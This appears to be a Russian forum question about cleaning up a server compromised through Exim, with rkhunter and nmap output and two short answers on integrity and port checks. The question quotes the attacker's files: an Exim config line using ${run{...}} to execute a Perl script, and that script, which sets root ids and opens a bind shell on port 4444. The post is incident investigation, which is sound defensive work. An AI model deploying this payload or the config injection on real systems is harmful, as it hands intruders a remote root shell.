# Восстановление и очистка сервера после взлома через EXIM

Tags: rkhunter, безопасность, сервер, exim

Изучаю ситуацию с сервером, который, судя по всему, был взломан через exim пару месяцев назад.

rkhunter пишет следующее:

> exim paniclog /var/log/exim4/paniclog on someserver.ru has non-zero size, mail system might be broken. The last 10 lines are quoted below.
>
> 2012-01-16 12:40:21 queue run: process 489 crashed with signal 9 while delivering 1RlGBb-00061O-B82012-02-12 17:37:06 Exim configuration error in line 3 of /var/tmp/eagJpvwwf:  malformed macro definition2012-02-12 17:37:10 string too large in smtp_notquit_exit()

В `/var/tmp/eagJpvwwf` записано следующее:

```
spool_directory = ${run{/usr/bin/perl Debian-exim@gators:/var/spool/exim4$ /var/tmp/qjUAJOwwDh}}
```

В свою очередь `/var/tmp/qjUAJOwwDh` содержит следующие строки:

```
#!/usr/bin/perl    
$) = $( = $> = $< = 0; system<DATA>;    __DATA__    perl -MIO -e '$p=fork();
exit,if$p;
$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;
$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>'
```

Удаленное сканирование этой машины через `nmap -p 1-65535 someserver.ru` показало:

> PORT      STATE    SERVICE21/tcp
>   open     ftp22/tcp
>   open     ssh25/tcp
>   open     smtp53/tcp
>   open     domain80/tcp
>   open     http110/tcp
>   open     pop3143/tcp
>   open     imap443/tcp
>   open     https993/tcp
>   open     imaps995/tcp
>   open     pop3s6666/tcp
>   filtered irc6667/tcp
>   filtered irc6668/tcp
>   filtered irc6669/tcp
>   filtered irc8080/tcp
>   open     http-proxy44965/tcp 
>   filtered unknown

При этом команды `netstat -anp | grep 4444` и `netstat -anp | grep 44965`, выполненные на самом сервере, ничего не показывают.

Как считаете: был ли взлом успешным? Что необходимо предпринять, чтобы исправить сложившуюся ситуацию и предотвратить подобное в будущем?

Comment: в netstat на сервере добавьте опцию -l (слушаемые порты), думаю, станет меньше поводов для паранойи

Answer (score 1):

Можно установить на виртуальную машину версию Linux, **аналогичную** той, которая стоит на сервере. Потом сравнить MD5-суммы всех бинарников из каталогов /sbin, /usr/bin на взломанном сервере c MD5-суммами бинарников на виртуальной машине. MD5-суммы не должны отличаться.

Answer (score 0):

По поводу netstat: можно ещё проверить iptables -t nat -L PREROUTING -n -v, может быть порт вообще другой слушается?